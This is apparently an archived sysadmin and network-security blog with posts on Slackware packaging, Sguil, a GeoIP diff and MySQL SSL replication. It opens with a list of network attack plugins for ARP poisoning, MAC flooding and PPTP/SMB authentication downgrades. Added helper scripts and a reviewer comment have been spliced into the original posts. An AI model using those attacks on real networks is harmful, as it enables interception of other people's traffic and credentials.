isolate 1.0 Isolate an host from the lan<br />
link_type 1.0 Check the link type (hub/switch)<br />
pptp_chapms1 1.0 PPTP: Forces chapms-v1 from chapms-v2<br />
pptp_clear 1.0 PPTP: Tries to force cleartext tunnel<br />
pptp_pap 1.0 PPTP: Forces PAP authentication<br />
pptp_reneg 1.0 PPTP: Forces tunnel re-negotiation<br />
rand_flood 1.0 Flood the LAN with random MAC addresses<br />
remote_browser 1.2 Sends visited URLs to the browser<br />
reply_arp 1.0 Simple arp responder<br />
repoison_arp 1.0 Repoison after broadcast ARP<br />
scan_poisoner 1.0 Actively search other poisoners<br />
search_promisc 1.2 Search promisc NICs in the LAN<br />
smb_clear 1.0 Tries to force SMB cleartext auth<br />
smb_down 1.0 Tries to force SMB to not use NTLM2 key auth<br />
stp_mangler 1.0 Become root of a switches spanning tree</span><br />
<br />
Nathaniel Richmond (http://www.blogger.com/profile/16307898781407130985)<br />
<br />
<span style="font-size: large;">Using slackbuilds.org to create Slackware packages</span> (2010-12-02)<br />
Sorry for the long posting hiatus but don't expect it to end. I just don't have a lot of time or material to devote to the blog right now.<br />
<br />
I recently wanted to upgrade Postfix on my Slackware mail server. I used to use packages from LinuxPackages.net for unofficial packages, but the site has gotten less active and always had a reputation for varying package quality. My preference is using the <a href="http://slackbuilds.org/">SlackBuilds</a> to build my own packages. It's fairly simple to download their build script, edit as needed, then build a Slackware package from source.<br />
<br />
Since Postfix is not available from Slackware official repositories, I downloaded the <a href="http://slackbuilds.org/repository/13.1/network/postfix/">SlackBuild files</a> and then the Postfix source.<br />
<pre>$ wget http://postfix.cs.utah.edu/source/official/postfix-2.6.8.tar.gz
$ wget http://slackbuilds.org/slackbuilds/13.1/network/postfix.tar.gz
$ tar xvzf postfix.tar.gz
$ ls postfix/
README postfix-2.6.8.tar.gz postfix.info slack-desc
doinst.sh postfix.SlackBuild* rc.postfix</pre>I am using Cyrus-SASL, so it was important for me to note the following from the SlackBuild Postfix page.<br />
<blockquote>This script builds postfix with support for Dovecot SASL but does not<br />
include any support for Cyrus-SASL. If you need to enable support for<br />
Cyrus see SASL_README in the source code.</blockquote>I also noted the following from the postfix.SlackBuild file itself.<br />
<pre># Postfix unfortunately does not use a handy ./configure script so you
# must generate the makefiles using (what else?) "make makefiles". The
# following includes support for TLS and SASL. It should automatically
# find PCRE and DB3 support. The docs have information for adding
# additional support such as MySQL or LDAP.</pre>I changed the "make makefiles" lines from:<br />
<pre>make makefiles \
CCARGS='-DUSE_SASL_AUTH -DDEF_SERVER_SASL_TYPE=\"dovecot\" -DUSE_TLS' \
AUXLIBS="-lssl -lcrypto"</pre>to:<br />
<pre>make makefiles CCARGS="-DUSE_SASL_AUTH -DUSE_CYRUS_SASL -DHAS_PCRE \
-I/usr/local/include/sasl -I/usr/include" \
AUXLIBS="-L/usr/local/lib -lsasl2 -L/usr/lib -lpcre"</pre>This added Cyrus-SASL support and also fixed a problem I was having with it finding PCRE. I also changed the VERSION variable to 2.6.8 since the postfix.SlackBuild file was for 2.6.1. After the changes, all I have to do is run the postfix.SlackBuild file then use "upgradepkg" on the resulting postfix-2.6.8-iX86-1_SBo.tgz package. (Note that official packages use xz for compression now, not gzip, so they will have the extension txz).<br />
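One check worth adding to that routine, as an added example rather than anything from SlackBuilds.org: compare the downloaded tarball against the MD5SUM line in the .info file before running the SlackBuild (the MD5SUM field name is the SBo convention; the demo files are constructed). It also shows why bumping VERSION the way the post does makes that check fail until MD5SUM is updated for the new tarball.

```shell
# Added example (not part of the SlackBuilds.org scripts): check a downloaded
# source tarball against the MD5SUM recorded in the SlackBuild's .info file
# before running the SlackBuild. Assumes the SBo .info layout, i.e. a line
# MD5SUM="<hex>", and md5sum(1) from coreutils.
#
# Usage: sbo_verify_source postfix.info postfix-2.6.8.tar.gz
# Returns 0 on match, 1 on mismatch, 2 if the .info has no MD5SUM line.
sbo_verify_source() {
    info=$1
    tarball=$2
    expected=$(sed -n 's/^MD5SUM="\([0-9a-fA-F]*\)".*/\1/p' "$info" | head -n 1 | tr 'A-F' 'a-f')
    if [ -z "$expected" ]; then
        echo "no MD5SUM line in $info" >&2
        return 2
    fi
    actual=$(md5sum "$tarball" | cut -d' ' -f1)
    if [ "$actual" = "$expected" ]; then
        echo "OK: $tarball matches $info"
        return 0
    fi
    # This is exactly what happens after bumping VERSION (2.6.1 -> 2.6.8 in
    # the post) without touching MD5SUM: the .info still describes the old
    # tarball, so get the new tarball's published checksum and update it.
    echo "MISMATCH: $tarball is $actual but $info expects $expected" >&2
    return 1
}

# Constructed demonstration, not real SBo files: a stand-in tarball and an
# .info whose MD5SUM was written for a different (older) release.
sbo_demo() {
    dir=$(mktemp -d)
    printf 'postfix-2.6.8 source stand-in\n' > "$dir/postfix-2.6.8.tar.gz"
    printf 'PRGNAM="postfix"\nVERSION="2.6.1"\nMD5SUM="00000000000000000000000000000000"\n' \
        > "$dir/postfix.info"
    sbo_verify_source "$dir/postfix.info" "$dir/postfix-2.6.8.tar.gz"
    rc=$?
    rm -rf "$dir"
    return $rc
}

sbo_demo || true   # prints the MISMATCH line and returns 1
```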
<br />
The next package I will create using SlackBuilds is cyrus-imapd since it also is not included in Slackware. Cyrus-SASL actually has an official package, but I've been running Cyrus for so long that I have always installed it from source. I don't remember if that is because it wasn't available as a package back in the day or just because I was using some non-standard options.<br />
<br />
<span style="font-size: large;">March Slackware-current: libblkid.so.1</span> (2010-03-14)<br />
The Slackware-current updates from March 1, 2010, included updates to both the e2fsprogs package and the util-linux-ng package. An important thing to note is that libblkid was moved out of e2fsprogs and into util-linux-ng. If you search the web for libblkid.so.1, slackpkg, util-linux-ng, and e2fsprogs, you will see various forum posts about not being able to boot. This is because libblkid.so.1 is required to mount and the updates included a new kernel, which meant a lot of people updated then rebooted without having util-linux-ng installed. Booting without the library will get you error messages about libblkid.so.1 not being found when the system tries to mount the drives.<br />
<pre>$ man libblkid
LIBBLKID(3)                                                     LIBBLKID(3)
NAME
       libblkid - block device identification library
SYNOPSIS
       #include &lt;blkid/blkid.h&gt;
       cc file.c -lblkid
DESCRIPTION
       The libblkid library is used to identify block devices (disks) as to
       their content (e.g. filesystem type) as well as extracting additional
       information such as filesystem labels/volume names, unique
       identifiers/serial numbers, etc.</pre>If you don't already have util-linux-ng installed then make sure to install it before rebooting since the update to e2fsprogs will remove libblkid.<br />
<pre>$ sudo slackpkg update
---snip---
$ sudo slackpkg install util-linux-ng
---snip---
$ sudo slackpkg install-new
---snip---
$ sudo slackpkg upgrade-all</pre>If you get stuck because you ran upgrade-all, don't have util-linux-ng installed, then rebooted for the kernel update, you can boot to the Slackware install CD or DVD so you can install the old version of e2fsprogs or the new util-linux-ng. This will allow you to boot normally then fix whatever is needed, such as installing the new util-linux-ng and/or upgrading e2fsprogs.<br />
<br />
<span style="font-size: large;">Customizing Slackware Tcl Package for Sguil</span> (2010-03-13)<br />
Most distributions these days are configuring their Tcl packages with <tt>--enable-threads</tt> as a default. Slackware-current switched some months back with the following in the ChangeLog.txt.<br />
<br />
<pre>+--------------------------+
Mon Dec 7 02:13:13 UTC 2009
d/ruby-1.9.1_p243-i486-3.txz: Rebuilt.
Added an explicit --enable-pthread. This is mostly to make sure that we get
the expected option set from future releases of Ruby -- it appears that not
only is --enable-pthread the default in ruby-1.9.1, but trying to use
--disable-pthread doesn't work. Furthermore, Ruby and Tcl/Tk no longer work
together unless both Ruby and Tcl/Tk are compiled with thread support.
Compiling Tcl/Tk with thread support has caused some problems in the past.
If a threaded Tcl app tries to fork(), it will hang, but by now most affected
Tcl apps (such as eggdrop) should have patches available.
Anyway, this should fix the issues with Ruby and Tk. Please test it, and
report any other problems that arise.
tcl/tcl-8.5.8-i486-1.txz: Upgraded.
Compiled using --enable-threads, since Ruby requires it to work with Tk.
tcl/tclx-8.4-i486-3.txz: Rebuilt.
Recompiled using --enable-threads.
tcl/tix-8.4.3-i486-2.txz: Rebuilt.
Recompiled using --enable-threads.
tcl/tk-8.5.8-i486-1.txz: Upgraded.
Compiled using --enable-threads, since Ruby requires it to work with Tk.</pre><pre>+--------------------------+ </pre>The Sguil daemon <a href="http://nsmwiki.org/Sguil_FAQ#Sguild_complains_about_threading_issues.2C_then_dies" target="_blank">will not work with threaded Tcl</a>, so to fix this you need to build a package for the distribution of your choice with the <tt>--disable-threads</tt> configure option. In Slackware and most other distributions, it is fairly simple to customize a package.<br />
<br />
Download Tcl from the <a href="ftp://ftp.slackware.com/pub/slackware/slackware-current/source/tcl/tcl/" target="_blank">source directory</a> on the Slackware mirror of your choice. It should include a slack-desc file, a tcl.SlackBuild file, and the Tcl source. Modify the tcl.SlackBuild file to replace <tt>--enable-threads</tt> with <tt>--disable-threads</tt>.<br />
<pre>./configure \
--prefix=/usr \
--libdir=/usr/lib${LIBDIRSUFFIX} \
--enable-shared \
--disable-threads \
--enable-man-symlinks \
--enable-man-compression=gzip \
${CONFARGS} \
--build=$ARCH-slackware-linux</pre>You may also want to modify the slack-desc to note that this is a non-threaded version. Then build the new package.<br />
<pre>$ sh tcl.SlackBuild
---snip---
Slackware package /tmp/tcl-8.5.8-i486-1.txz created.</pre>As you see, the package will get written to /tmp by default. Now replace the threaded version with the new non-threaded version.<br />
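Two helpers as an added example, not part of Slackware's tcl.SlackBuild: one flips the configure flag in a copy of the SlackBuild (GNU sed -i is assumed), the other asks the installed tclsh whether it was built with thread support, which is the thing to confirm before starting sguild against the new package.

```shell
# Added example, not part of Slackware's tcl.SlackBuild. Assumes the flag
# appears as its own "--enable-threads \" line, as in the excerpt above,
# and GNU sed (Slackware's) for the in-place edit.
#
# Usage: tcl_disable_threads_in_slackbuild tcl.SlackBuild
# Returns 0 if exactly one --enable-threads line was replaced, 1 otherwise
# (zero or several matches means the script layout is not what we expect).
tcl_disable_threads_in_slackbuild() {
    sb=$1
    n=$(grep -c -- '--enable-threads' "$sb")
    if [ "$n" -ne 1 ]; then
        echo "expected one --enable-threads line in $sb, found $n" >&2
        return 1
    fi
    sed -i 's/--enable-threads/--disable-threads/' "$sb"
    grep -q -- '--disable-threads' "$sb"
}

# After upgradepkg, ask the interpreter itself: Tcl only defines
# tcl_platform(threaded) in a threaded build, so a non-threaded package
# prints 0 here. Prints "threaded" or "non-threaded"; returns 1 without tclsh.
tcl_thread_status() {
    command -v tclsh >/dev/null 2>&1 || { echo "tclsh not found" >&2; return 1; }
    if echo 'puts [info exists tcl_platform(threaded)]' | tclsh | grep -q 1; then
        echo threaded
    else
        echo non-threaded
    fi
}
```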
<pre>$ sudo upgradepkg --reinstall /tmp/tcl-8.5.8-i486-1.txz
+==============================================================================
| Upgrading tcl-8.5.8-i486-1 package using /tmp/tcl-8.5.8-i486-1.txz
+==============================================================================
Pre-installing package tcl-8.5.8-i486-1...
Removing package /var/log/packages/tcl-8.5.8-i486-1-upgraded-2010-03-13,20:03:22...
Verifying package tcl-8.5.8-i486-1.txz.
Installing package tcl-8.5.8-i486-1.txz:
PACKAGE DESCRIPTION:
# tcl (Tool Command Language)
#
# Tcl, developed by Dr. John Ousterhout, is a simple to use text-based
# script language with many built-in features which make it especially
# nice for writing interactive scripts.
#
# This is a version customized by nr that uses --disable-threads.
#
Executing install script for tcl-8.5.8-i486-1.txz.
Package tcl-8.5.8-i486-1.txz installed.
Package tcl-8.5.8-i486-1 upgraded with new package /tmp/tcl-8.5.8-i486-1.txz.
</pre><br />
<span style="font-size: large;">Security News and Reporting Gets a New Blog</span> (2010-01-01)<br />
Brian Krebs announced on 24 December that his last day at <a href="http://voices.washingtonpost.com/securityfix/2009/12/farewell_2009_and_the_washingt.html" target="_blank"> The Washington Post Company would be 31 December</a>. Krebs will continue to blog at <a href="http://www.krebsonsecurity.com/" target="_blank">Krebs on Security</a>. He has a good history of security reporting, and generally concentrates on investigative reporting and analysis.<br />
<br />
He notes:<br />
<blockquote>With a few exceptions, I will continue to eschew chasing the security story-of-the day, as there are plenty of sites you can go for that. My focus will remain on publishing information and reporting that you won’t find anywhere else – and with a minimum of editorializing.<br />
</blockquote>I see this as a good description of his work and his first story, <a href="http://www.krebsonsecurity.com/2009/12/virus-scanners-for-virus-authors/" target="_blank">Virus Scanners for Virus Authors</a>, is a good example of the type of reporting he has handled over recent years.<br />
<br />
<span style="font-size: large;">SNAFU: Peer-to-peer and Sensitive Information</span> (2009-11-19)<br />
A lot of people noticed the recent <a href="http://www.washingtonpost.com/wp-dyn/content/article/2009/10/30/AR2009103001959_pf.html" target="_blank">Congressional ethics probe</a> that was disclosed because a junior staff member put a sensitive document on her computer at home. Not surprisingly, her computer also had file-sharing software installed and she inadvertently was sharing the document on a peer-to-peer network. Some are calling for <a href="http://www.washingtonpost.com/wp-dyn/content/article/2009/10/30/AR2009103003749_pf.html" target="_blank">a review of congressional cybersecurity policies</a> after the breach. One thing to remember is that this sort of thing is not unique, new or surprising.<br />
<br />
<a href="http://blog.vorant.com/" target="_blank">David Bianco</a> <a href="http://blog.vorant.com/2006/06/laptop-encryption-i-have-better-idea.html" target="_blank">wrote about a similar topic in 2006</a> and covers the important points, though I would add that the problem also extends to personal systems, not just mobile devices. Whether the vulnerability is a mobile device that is easily lost or stolen (laptop, smart-phone, music player, etc), or a personal system running software that would never be allowed in a work environment, don't put sensitive information on systems that are difficult to control.<br />
<br />
<span style="font-size: large;">SANS WhatWorks in Incident Detection Summit 2009</span> (2009-11-17)<br />
I am scheduled to be a part of several discussion panels at the <a href="http://www.sans.org/incident-detection-summit-2009/" target="_blank">SANS WhatWorks in Incident Detection Summit 2009</a> on 9-10 December. There are a lot of good speakers participating and the <a href="http://www.sans.org/incident-detection-summit-2009/agenda.php" target="_blank">agenda will cover many topics related to incident detection</a>. I believe there is still space available for anyone that is interested in attending.<br />
<br />
From SANS: <br />
<blockquote>Following the success of the 2008 and 2009 editions of the SANS WhatWorks in Forensics and Incident Response Summits, SANS is teaming with <a href="http://taosecurity.blogspot.com/" target="_blank">Richard Bejtlich</a> to create a practitioner-focused event dedicated to incident detection operations. The SANS Incident Detection Summit will share tools, tactics, and techniques practiced by more than 40 of the world's greatest incident detectors in two full days of content consisting of keynotes, expert briefings, and dynamic panels.<br />
<br />
<a href="http://www.sans.org/incident-detection-summit-2009/" target="_blank">http://www.sans.org/incident-detection-summit-2009/</a><br />
</blockquote><br />
<span style="font-size: large;">Hackintosh Dell Mini 9</span> (2009-10-19)<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpQOtK2zivHcJ4tPca4Zy-NiBUMiN-4WHt3dv0N_rYWc58Gr7uP6L4XAi9vR3qHTYW6_GreFEO_Nl0Msfq0oNNJW4BuLsaqGM88XobBKtErzi1AlPPlh5cXRezl88gee4bpBLxDsAW4kIq/s1600-h/hackintosh9.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpQOtK2zivHcJ4tPca4Zy-NiBUMiN-4WHt3dv0N_rYWc58Gr7uP6L4XAi9vR3qHTYW6_GreFEO_Nl0Msfq0oNNJW4BuLsaqGM88XobBKtErzi1AlPPlh5cXRezl88gee4bpBLxDsAW4kIq/s400/hackintosh9.png" /></a><br />
</div>I have been playing with a Dell Mini 9 running Mac OS 10.5.8 for the past couple days. It's pretty nice for a tiny laptop. There are a few guides on the Internet showing how to set it up, including one on <a href="http://www.mydellmini.com/forum/mac-os-x-guides/3743-how-install-mac-os-x-dellefi-method.html" target="_blank">mydellmini.com</a> and another on <a href="http://gizmodo.com/5156903/how-to-hackintosh-a-dell-mini-9-into-the-ultimate-os-x-netbook" target="_blank">Gizmodo</a>.<br />
<br />
If you want a small laptop running Mac OSX, this is pretty cool. The Dell outlet sometimes still has these laptops, but remember to factor in that they are old and need a larger SSD. Also take into account that installing even a retail copy of OSX on non-Apple hardware may violate their EULA.<br />
<div class="separator" style="clear: both; text-align: center;"><br />
</div><br />
<span style="font-size: large;">Adding GeoIP to the Sguil Client</span> (2009-10-12)<br />
This is a post I meant to publish months ago, but for some reason slipped off my radar. I was reading the Sguil <a href="http://nsmwiki.org/Sguil_Feature_Wish_List" target="_blank">wishlist</a> on <a href="http://nsmwiki.org/Main_Page" target="_blank">NSMWiki</a> and saw something that looked simple to implement. Here are a couple diffs I created after adding a menu item for GeoIP in sguil.tk and a proc for it in lib/extdata.tcl. All I did was copy the existing DShield proc and menu items, then edit as needed to change the URL and menu listings.<br />
<br />
I think it should work and I downloaded a pristine copy of the files before running diff since I've <a href="http://eatingsecurity.blogspot.com/2007/10/sguil-070-client-and-netbios-names.html" target="_blank">hacked Sguil files previously</a>, but no warranty is assumed or implied, et cetera.<br />
<br />
Ideally, I would love to help out and tackle some of the other items on the wishlist. My time constraints make it hard, but at least I now have a <a href="http://nsmwiki.org/Sguil_FAQ#Seriously.__Why_Tcl.3F" target="_blank">Tcl book</a>.<br />
<br />
sguil.tk<br />
<pre>2865a2866
> .ipQueryMenu add cascade -label "GeoIP Lookup" -menu $ipQueryMenu.geoIPMenu
2873a2875,2876
> menu $ipQueryMenu.geoIPMenu -tearoff 0 -background $SELECTBACKGROUND -foreground $SELECTFOREGROUND \
> -activeforeground $SELECTBACKGROUND -activebackground $SELECTFOREGROUND
2917a2921,2922
> $ipQueryMenu.geoIPMenu add command -label "SrcIP" -command "GetGeoIP srcip"
> $ipQueryMenu.geoIPMenu add command -label "DstIP" -command "GetGeoIP dstip"</pre>lib/extdata.tcl<br />
<pre>211a212,243
> proc GetGeoIP { arg } {
>
> global DEBUG BROWSER_PATH CUR_SEL_PANE ACTIVE_EVENT MULTI_SELECT
>
> if { $ACTIVE_EVENT && !$MULTI_SELECT} {
>
> set selectedIndex [$CUR_SEL_PANE(name) curselection]
>
> if { $arg == "srcip" } {
> set ipAddr [$CUR_SEL_PANE(name) getcells $selectedIndex,srcip]
> } else {
> set ipAddr [$CUR_SEL_PANE(name) getcells $selectedIndex,dstip]
> }
>
> if {[file exists $BROWSER_PATH] && [file executable $BROWSER_PATH]} {
>
> # Launch browser
> exec $BROWSER_PATH http://www.geoiptool.com/?IP=$ipAddr &
>
> } else {
>
> tk_messageBox -type ok -icon warning -message\
> "$BROWSER_PATH does not exist or is not executable. Please update the BROWSER_PATH variable\
> to point your favorite browser."
> puts "Error: $BROWSER_PATH does not exist or is not executable."
>
> }
>
> }
>
> }
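Review bot: the exec on the "Launch browser" line passes $ipAddr to the browser unchecked, and the value comes straight from the selected event pane cell; guard it before the exec, for example with "if {![regexp {^\d{1,3}(\.\d{1,3}){3}$} $ipAddr]} { return }", so a malformed or empty cell never becomes part of the URL (the DShield proc this was copied from has the same gap). The else branch also treats any argument other than "srcip" as dstip; an explicit "dstip" test with an error for anything else would surface menu wiring mistakes instead of silently looking up the wrong address. Minor: the warning text "to point your favorite browser" should read "to point to your favorite browser".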
></pre><br />
<span style="font-size: large;">MySQL replication on RHEL</span> (2009-09-15)<br />
I recently configured MySQL for replication after first enabling SSL connections between the two systems that would be involved with replication. I have to say that MySQL documentation is excellent and all these notes are simply based on what is available on the MySQL site. I have included links to as many of the relevant sections of the documentation as possible.<br />
<br />
For reference, here is the MySQL manual on enabling SSL: <a href="http://dev.mysql.com/doc/refman/5.0/en/secure-using-ssl.html" target="_blank">5.5.7.2. Using SSL Connections</a><br />
<br />
Before beginning, it is a good idea to create a directory for the SSL output files and make sure all the files end up there.<br />
<br />
MySQL’s RHEL5 packages from mysql.com support SSL by default, but to check you can run:<br />
<br />
<hr align="center" color="blue" width="100%" /><pre>$ mysqld --ssl --help
mysqld Ver 5.0.67-community-log for redhat-linux-gnu on i686 (MySQL Community Edition (GPL))
Copyright (C) 2000 MySQL AB, by Monty and others
This software comes with ABSOLUTELY NO WARRANTY. This is free software,
and you are welcome to modify and redistribute it under the GPL license
Starts the MySQL database server
Usage: mysqld [OPTIONS]
For more help options (several pages), use mysqld --verbose --help</pre><hr align="center" color="blue" width="100%" /><br />
The command will <a href="http://dev.mysql.com/doc/refman/5.0/en/secure-using-ssl.html" target="_blank">create an error</a> if there is no SSL support.<br />
<br />
Next, check that the MySQL server has SSL enabled. The below output means that the server supports SSL but it is not enabled. Enabling it can be done at the command line or in the configuration file, which will be detailed later.<br />
<br />
<hr align="center" color="blue" width="100%" /><pre>$ mysql -u username -p -e"show variables like 'have_ssl'"
Enter password:
+---------------+----------+
| Variable_name | Value |
+---------------+----------+
| have_ssl | DISABLED |
+---------------+----------+</pre><hr align="center" color="blue" width="100%" /><br />
Documentation on setting up certificates:<br />
<a href="http://dev.mysql.com/doc/refman/5.0/en/secure-create-certs.html" target="_blank">5.5.7.4. Setting Up SSL Certificates for MySQL</a><br />
<br />
First, generate the CA key and CA certificate:<br />
<br />
<hr align="center" color="blue" width="100%" /><pre>$ openssl genrsa 2048 > mysql-ca-key.pem
Generating RSA private key, 2048 bit long modulus
............................................+++
............+++
$ openssl req -new -x509 -nodes -days 356 -key mysql-ca-key.pem > mysql-ca-cert.pem
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [GB]:US
State or Province Name (full name) [Berkshire]:California
Locality Name (eg, city) [Newbury]:Burbank
Organization Name (eg, company) [My Company Ltd]:Acme Road Runner Traps
Organizational Unit Name (eg, section) []:Acme IRT
Common Name (eg, your name or your server's hostname) []:mysql.acme.com
Email Address []:acme-irt@acme.com</pre><hr align="center" color="blue" width="100%" /><br />
Create the server certificate:<br />
<br />
<hr align="center" color="blue" width="100%" /><pre>$ openssl req -newkey rsa:2048 -days 365 -nodes -keyout mysql-server-key.pem >
mysql-server-req.pem
Generating a 2048 bit RSA private key
.............................+++
.............................................................+++
writing new private key to 'mysql-server-key.pem'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [GB]:US
State or Province Name (full name) [Berkshire]:California
Locality Name (eg, city) [Newbury]:Burbank
Organization Name (eg, company) [My Company Ltd]:Acme Road Runner Traps
Organizational Unit Name (eg, section) []:Acme IRT
Common Name (eg, your name or your server's hostname) []:mysql.acme.com
Email Address []:acme-irt@acme.com
Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
$ openssl x509 -req -in mysql-server-req.pem -days 356 -CA mysql-ca-cert.pem -CAkey mysql-ca-key.pem
-set_serial 01 > mysql-server-cert.pem
Signature ok
subject=/C=US/ST=California/L=Burbank/O=Acme Road Runner Traps/OU=Acme IRT/CN=
mysql.acme.com/emailAddress=acme-irt@acme.com
Getting CA Private Key</pre><hr align="center" color="blue" width="100%" /><br />
Finally, create the client certificate:<br />
<br />
<hr align="center" color="blue" width="100%" /><pre>$ openssl req -newkey rsa:2048 -days 356 -nodes -keyout mysql-client-key.pem >
mysql-client-req.pem
Generating a 2048 bit RSA private key
................+++
.................+++
writing new private key to 'mysql-client-key.pem'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [GB]:US
State or Province Name (full name) [Berkshire]:California
Locality Name (eg, city) [Newbury]:Burbank
Organization Name (eg, company) [My Company Ltd]:Acme Road Runner Traps
Organizational Unit Name (eg, section) []:Acme IRT
Common Name (eg, your name or your server's hostname) []:mysql.acme.com
Email Address []:acme-irt@acme.com
Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
$ openssl x509 -req -in mysql-client-req.pem -days 356 -CA mysql-ca-cert.pem
-CAkey mysql-ca-key.pem -set_serial 01 > mysql-client-cert.pem
Signature ok
subject=/C=US/ST=California/L=Burbank/O=Acme Road Runner Traps/OU=Acme
IRT/CN=mysql.acme.com/emailAddress=acme-irt@acme.com
Getting CA Private Key
[nr@mysqld mysqlcerts]$ ls
mysql-ca-cert.pem mysql-client-key.pem mysql-server-key.pem
mysql-ca-key.pem mysql-client-req.pem mysql-server-req.pem
mysql-client-cert.pem mysql-server-cert.pem</pre><hr align="center" color="blue" width="100%" /><br />
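A consistency check for the files just generated, added here as an example rather than taken from the post or the MySQL manual: it verifies a certificate against the CA, confirms the private key belongs to it, compares the leaf subject with the CA subject (later editions of the MySQL manual warn that server and client certificates must not reuse the CA's Common Name, and every certificate above uses mysql.acme.com) and prints the expiry date. File names follow the post; openssl(1) is assumed.

```shell
# Added example, not from the post or the MySQL manual: sanity-check the
# certificate set generated above before pointing my.cnf at it. Assumes the
# post's file names (mysql-ca-cert.pem, mysql-<role>-cert.pem,
# mysql-<role>-key.pem) and openssl(1).
#
# Usage: mysql_ssl_check <dir> <role>    e.g. mysql_ssl_check /etc/mysql/openssl server
# Returns 0 when the role's cert chains to the CA, its key matches the cert
# and the leaf subject differs from the CA subject; 1 otherwise.
mysql_ssl_check() {
    dir=$1
    role=$2
    ca="$dir/mysql-ca-cert.pem"
    cert="$dir/mysql-$role-cert.pem"
    key="$dir/mysql-$role-key.pem"
    rc=0

    # 1. Does the cert validate against the CA (signature, validity dates)?
    if ! openssl verify -CAfile "$ca" "$cert" >/dev/null 2>&1; then
        echo "FAIL: $cert does not verify against $ca" >&2
        rc=1
    fi

    # 2. Does the private key belong to this cert? Compare the RSA moduli.
    cert_mod=$(openssl x509 -noout -modulus -in "$cert" 2>/dev/null)
    key_mod=$(openssl rsa -noout -modulus -in "$key" 2>/dev/null)
    if [ -z "$cert_mod" ] || [ "$cert_mod" != "$key_mod" ]; then
        echo "FAIL: $key does not match $cert" >&2
        rc=1
    fi

    # 3. Later MySQL manuals warn that server/client certificates must not
    #    reuse the CA's Common Name or OpenSSL-built servers reject them; the
    #    post's certificates all use mysql.acme.com and would trip this.
    ca_subj=$(openssl x509 -noout -subject -in "$ca" 2>/dev/null)
    leaf_subj=$(openssl x509 -noout -subject -in "$cert" 2>/dev/null)
    if [ "$ca_subj" = "$leaf_subj" ]; then
        echo "WARN: $cert has the same subject as the CA; use a distinct CN" >&2
        rc=1
    fi

    # 4. Report expiry so a 356/365-day certificate does not surprise you later.
    openssl x509 -noout -enddate -in "$cert" 2>/dev/null | sed "s|^|$role: |"
    [ "$rc" -eq 0 ] && echo "OK: $role certificate set in $dir is consistent"
    return $rc
}
```

Run it once per role (server, then client) on the directory holding the PEM files.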
To enable SSL when starting mysqld, the following should be in /etc/my.cnf under the [mysqld] section. For this example, I put the files in <tt>/etc/mysql/openssl</tt>:<br />
<br />
<hr align="center" color="blue" width="100%" /><pre>ssl-ca="/etc/mysql/openssl/mysql-ca-cert.pem"
ssl-cert="/etc/mysql/openssl/mysql-server-cert.pem"
ssl-key="/etc/mysql/openssl/mysql-server-key.pem"</pre><hr align="center" color="blue" width="100%" /><br />
To use any client, for instance mysql from the command line or the GUI MySQL Administrator, copy the client cert and key to a dedicated folder on the local box along with ca-cert. You will have to configure the client to use the client certificate, client key, and CA certificate.<br />
<br />
To connect with the mysql client using SSL, copy the client certificates to a folder, for instance /etc/mysql, then under the [client] section in /etc/my.cnf:<br />
<br />
<hr align="center" color="blue" width="100%" /><pre>ssl-ca="/etc/mysql/openssl/mysql-ca-cert.pem"
ssl-cert="/etc/mysql/openssl/mysql-client-cert.pem"
ssl-key="/etc/mysql/openssl/mysql-client-key.pem"</pre><hr align="center" color="blue" width="100%" /><br />
In MySQL Administrator, the following is an example you would put into the Advanced Parameters section if you want to connect using SSL.<br />
<br />
<hr align="center" color="blue" width="100%" /><pre>SSL_CA U:/keys/mysql-ca-cert.pem
SSL_CERT U:/keys/mysql-client-cert.pem
SSL_KEY U:/keys/mysql-client-key.pem
USE_SSL Yes</pre><hr align="center" color="blue" width="100%" /><br />
<span style="font-size: large;">Replication</span><br />
<br />
Before configuring replication, I made sure to review the <a href="http://dev.mysql.com/doc/refman/5.0/en/replication.html" target="_blank">MySQL replication documentation</a>.<br />
<br />
<a href="http://dev.mysql.com/doc/refman/5.0/en/replication-howto-repuser.html" target="_blank">16.1.1.1. Creating a User for Replication</a><br />
Because MySQL stores the replication user’s name and password using plain text in the master.info file, it’s recommended to create a dedicated user that only has the REPLICATION SLAVE privilege. The replication user needs to be created on the master so the slaves can connect with that user.<br />
<br />
<hr align="center" color="blue" width="100%" /><pre>GRANT REPLICATION SLAVE ON *.* TO 'repl'@'192.168.1.50' IDENTIFIED BY 'password';</pre><hr align="center" color="blue" width="100%" /><br />
<a href="http://dev.mysql.com/doc/refman/5.0/en/replication-howto-masterbaseconfig.html" target="_blank">16.1.1.2. Setting the Replication Master Configuration</a><br />
Edit my.cnf to uncomment the “log-bin” line. Also uncomment “server-id = 1”. The server-id can be anything between 1 and 2^32 but must be unique.<br />
<br />
Also add “expire_logs_days” to my.cnf. If you don’t, the binary logs could fill up the disk partition because they are not deleted by default!<br />
<br />
<hr align="center" color="blue" width="100%" /><pre>expire_logs_days = 4</pre><hr align="center" color="blue" width="100%" /><br />
<a href="http://dev.mysql.com/doc/refman/5.0/en/replication-howto-slavebaseconfig.html" target="_blank">16.1.1.3. Setting the Replication Slave Configuration</a><br />
Set server-id to something different from the master in <tt>my.cnf</tt>. Although not required, enabling binary logging on the slave is also recommended for backups, crash recovery, and in case the slave will also be a master to other systems.<br />
<br />
<a href="http://dev.mysql.com/doc/refman/5.0/en/replication-howto-masterstatus.html" target="_blank">16.1.1.4. Obtaining the Master Replication Information</a><br />
I flush the tables to disk and lock them to temporarily prevent changes. <br />
<br />
<hr align="center" color="blue" width="100%" /><pre># mysql -u root -p -A dbname
mysql> FLUSH TABLES WITH READ LOCK;
